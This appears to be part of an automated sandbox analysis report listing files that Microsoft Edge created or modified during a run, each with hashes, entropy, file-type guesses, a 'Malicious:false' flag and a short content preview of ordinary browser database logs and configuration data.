                                                                                                                                                                                                                                                            SHA-512:607EA217955290B8801B71DBD6094A8B8D318CBEC8EE2599EDFF01082CA24E2ED5002616DF7C03274EB661772A0C6DBB0D254BABA62CA0EA28D7B88E0A998FAE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:12.423 1a4c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/03/07-15:40:12.492 1a4c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                            Size (bytes):2163821
                                                                                                                                                                                                                                                            Entropy (8bit):5.222860511241938
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:IbPMZpVafI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVafx2mjF
                                                                                                                                                                                                                                                            MD5:1C5F3AD0B0CFD65399057BA2137A4B73
                                                                                                                                                                                                                                                            SHA1:9BB999B35310D66B4D4725BEE1005F83146B3734
                                                                                                                                                                                                                                                            SHA-256:8450107FAB35E39FAA7227F90A4AB388147B50842A15717D61496B2F2CAD3824
                                                                                                                                                                                                                                                            SHA-512:8470AB7FD09D93AE52B0A8FC5FDA1C579193E42874783ECCBD1BD66EBED4BAB67F04AAC05D88228853098A2FC746350AB2746D17CC330689A6E77736C343D5B1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):337
                                                                                                                                                                                                                                                            Entropy (8bit):5.134887431361969
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypInG+q2PN723oH+Tcwt9Eh1tIFUt8pInQCXJZmwOp2VkwON723oH+Tcwt9Ehx:7ypmvVaYeb9Eh16FUt8pW5/Opm5OaYe8
                                                                                                                                                                                                                                                            MD5:9DE971FE2CCD488CDA077ED371B2506F
                                                                                                                                                                                                                                                            SHA1:0646E8A4C3495BCF1AA96E82B3A10BFD41572230
                                                                                                                                                                                                                                                            SHA-256:C9B6237AFAF5D32B626335E28436F4495731C3361CD821F591CDFEDC57F5CFEB
                                                                                                                                                                                                                                                            SHA-512:96AC7439836C2FD17AFB077B4E191B151A1235DCF2602A30F5D67E589D3739BB4746454E2DCC426CFF5C7901A4C37D0D84C9CD4937AE34DB38A8F9ADBFD1448E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:11.714 8e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/03/07-15:40:11.715 8e8 Recovering log #3.2025/03/07-15:40:12.998 8e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):337
                                                                                                                                                                                                                                                            Entropy (8bit):5.134887431361969
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypInG+q2PN723oH+Tcwt9Eh1tIFUt8pInQCXJZmwOp2VkwON723oH+Tcwt9Ehx:7ypmvVaYeb9Eh16FUt8pW5/Opm5OaYe8
                                                                                                                                                                                                                                                            MD5:9DE971FE2CCD488CDA077ED371B2506F
                                                                                                                                                                                                                                                            SHA1:0646E8A4C3495BCF1AA96E82B3A10BFD41572230
                                                                                                                                                                                                                                                            SHA-256:C9B6237AFAF5D32B626335E28436F4495731C3361CD821F591CDFEDC57F5CFEB
                                                                                                                                                                                                                                                            SHA-512:96AC7439836C2FD17AFB077B4E191B151A1235DCF2602A30F5D67E589D3739BB4746454E2DCC426CFF5C7901A4C37D0D84C9CD4937AE34DB38A8F9ADBFD1448E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:11.714 8e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/03/07-15:40:11.715 8e8 Recovering log #3.2025/03/07-15:40:12.998 8e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                                                            Entropy (8bit):0.46445663071916876
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfB/:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                                                                            MD5:B39C04DB543ECB5D3BCA0F1B4A274671
                                                                                                                                                                                                                                                            SHA1:C312021604D0CE2CF2B204E12382A73982BC4895
                                                                                                                                                                                                                                                            SHA-256:52E04C6C8A671EBF7C2C7CA428F9D2CF66B2823DBE4FA23705A45C196F890388
                                                                                                                                                                                                                                                            SHA-512:2300853049545C40E424C968E442383EC320ABB72239236EB9D5E078105C57C8761DCD25432F676C0C3F7AFA0C7FDD12E063F3F583C0872111815DBA913DF9FA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                                                            Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                            MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                            SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                            SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                            SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):352
                                                                                                                                                                                                                                                            Entropy (8bit):5.180156532622779
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypE54q2PN723oH+TcwtnG2tMsIFUt8pE5JZmwOpBNDkwON723oH+TcwtnG2tM2:7yp5vVaYebn9GFUt8pE/OpBF5OaYebnB
                                                                                                                                                                                                                                                            MD5:FA8C8AC93E93437B071386072C0F9FAC
                                                                                                                                                                                                                                                            SHA1:F4B93D7CDD59D7CBE08F60BCB52B5D5266673077
                                                                                                                                                                                                                                                            SHA-256:56364F4FA6B6C843A593E03B4716181A5AF63CE0984EA7A82CEAEB7449C6E1A9
                                                                                                                                                                                                                                                            SHA-512:A077E9F6A6877EE59761998B01262DD282EBE7AE27F785FD37A228052C849FA2D8EE9BB2517418FF9C001E517F3571425B7BDB0F21B49BC70C61A6F1EB4FF18C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:06.011 1a84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/03/07-15:40:06.011 1a84 Recovering log #3.2025/03/07-15:40:06.012 1a84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):352
                                                                                                                                                                                                                                                            Entropy (8bit):5.180156532622779
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypE54q2PN723oH+TcwtnG2tMsIFUt8pE5JZmwOpBNDkwON723oH+TcwtnG2tM2:7yp5vVaYebn9GFUt8pE/OpBF5OaYebnB
                                                                                                                                                                                                                                                            MD5:FA8C8AC93E93437B071386072C0F9FAC
                                                                                                                                                                                                                                                            SHA1:F4B93D7CDD59D7CBE08F60BCB52B5D5266673077
                                                                                                                                                                                                                                                            SHA-256:56364F4FA6B6C843A593E03B4716181A5AF63CE0984EA7A82CEAEB7449C6E1A9
                                                                                                                                                                                                                                                            SHA-512:A077E9F6A6877EE59761998B01262DD282EBE7AE27F785FD37A228052C849FA2D8EE9BB2517418FF9C001E517F3571425B7BDB0F21B49BC70C61A6F1EB4FF18C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:06.011 1a84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/03/07-15:40:06.011 1a84 Recovering log #3.2025/03/07-15:40:06.012 1a84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                            Entropy (8bit):0.6137158678337759
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jVEQjpjcEl4mL:TO8D4jJ/6Up+hE9Ez
                                                                                                                                                                                                                                                            MD5:6926F429CBBB194EBBF73731D1AA46A0
                                                                                                                                                                                                                                                            SHA1:D504D1B6D01D3397FDAF7D7073DCF9EEBAB4DFCD
                                                                                                                                                                                                                                                            SHA-256:A68E4BB4B7B100E629F4EE8645A3B02504CA9EC0FA92F0ECCA9786956AB05550
                                                                                                                                                                                                                                                            SHA-512:F2D5986D7A7C3E4B827BE737E5882E84226F5546A3CC2339861F0084288BA19F510B51F82D92057369E500E684212BAAF0E9A9072A66A55029684722FA2622F1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):375520
                                                                                                                                                                                                                                                            Entropy (8bit):5.354155251111514
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:OA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:OFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                            MD5:A46E196361C1B21E0D2011DD1CC89DD2
                                                                                                                                                                                                                                                            SHA1:7102A59348A1FBF62DE0E00766674A29075C93E3
                                                                                                                                                                                                                                                            SHA-256:478CFD365DD6D02A1A8FA3A331178B443217B0539BD5AA1AA2CB2D16A4823E23
                                                                                                                                                                                                                                                            SHA-512:8134A2FB215743E112EB6F89D0C40CF44D3D114E3A27DD8CE854A62A4EF4D7777C2556D73552F8BA6C7806C31B25B03E8FD2FF6CB8AD1516E74BDEC853AE9D31
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:...m.................DB_VERSION.1...Xq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13385853614617659..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):315
                                                                                                                                                                                                                                                            Entropy (8bit):5.171527492616633
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypI014M1N723oH+Tcwtk2WwnvB2KLlMpI7hq2PN723oH+Tcwtk2WwnvIFUv:7ypv14saYebkxwnvFLOpmvVaYebkxwnp
                                                                                                                                                                                                                                                            MD5:F3BE926530C0F4A48CA4A048569E08EA
                                                                                                                                                                                                                                                            SHA1:307FAEEDF85AF080C359FDED5C4FC973BFF66ABF
                                                                                                                                                                                                                                                            SHA-256:06BB3E6C7E121683CAC90179917C44C594855B633225905B9FED64D718C51892
                                                                                                                                                                                                                                                            SHA-512:EE98602B560166D7606AF6F74AF23CFD5F05CDC4E54133B9AF618D5D7C1D69FF907CB09CB7C5CE660453CC326D4F124A8A4E3D4B5F52ADBDFBA0482C198062E1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:11.688 12f4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/03/07-15:40:11.783 12f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                            Size (bytes):358860
                                                                                                                                                                                                                                                            Entropy (8bit):5.324603881148351
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rd:C1gAg1zfvF
                                                                                                                                                                                                                                                            MD5:1B4682E402389F5786F27A0AEAD582C4
                                                                                                                                                                                                                                                            SHA1:C3D9CCC23960110ACEF3E03200EFACD463CE5DBB
                                                                                                                                                                                                                                                            SHA-256:CD50236F4F53E1BF46D7AFBF9B60284064434E29E81F6E54F030E2CD33FB72F3
                                                                                                                                                                                                                                                            SHA-512:F8411B86A6D01A8A8C222DD09E31ACFE34ED70B36CE914CFD6DEF73C193DF70CFDD4FDBD8DCF185CDB13E99FABC3098E2C7615AAD384C3B0FC832A2FEDCA5E8B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):418
                                                                                                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                            MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                            SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                            SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                            SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                            Entropy (8bit):5.1920298044409705
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypVTi9+q2PN723oH+Tcwt8aPrqIFUt8pVztJZmwOpVzt9VkwON723oH+Tcwt8h:7ypxBvVaYebL3FUt8ph3/Ophl5OaYebc
                                                                                                                                                                                                                                                            MD5:391BDF3D24C6096CAA2ABE05557127C4
                                                                                                                                                                                                                                                            SHA1:8532D2E1D02A53D6B80366C3B46EFCB77DDF4E35
                                                                                                                                                                                                                                                            SHA-256:E7126069A3653720FD073081279E83BB98F7327888E748D543734BABB12D8E50
                                                                                                                                                                                                                                                            SHA-512:BD954591E9BA724C3E2223D6D7572EBA541E1F10B92797DF6242103EF42BB47AF0A4E3A984A873BAF6330FB53502D64958D016398B18011B2941AE247A78B5D2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:05.968 1a48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/03/07-15:40:05.969 1a48 Recovering log #3.2025/03/07-15:40:05.969 1a48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                            Entropy (8bit):5.1920298044409705
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypVTi9+q2PN723oH+Tcwt8aPrqIFUt8pVztJZmwOpVzt9VkwON723oH+Tcwt8h:7ypxBvVaYebL3FUt8ph3/Ophl5OaYebc
                                                                                                                                                                                                                                                            MD5:391BDF3D24C6096CAA2ABE05557127C4
                                                                                                                                                                                                                                                            SHA1:8532D2E1D02A53D6B80366C3B46EFCB77DDF4E35
                                                                                                                                                                                                                                                            SHA-256:E7126069A3653720FD073081279E83BB98F7327888E748D543734BABB12D8E50
                                                                                                                                                                                                                                                            SHA-512:BD954591E9BA724C3E2223D6D7572EBA541E1F10B92797DF6242103EF42BB47AF0A4E3A984A873BAF6330FB53502D64958D016398B18011B2941AE247A78B5D2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:05.968 1a48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/03/07-15:40:05.969 1a48 Recovering log #3.2025/03/07-15:40:05.969 1a48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):418
                                                                                                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
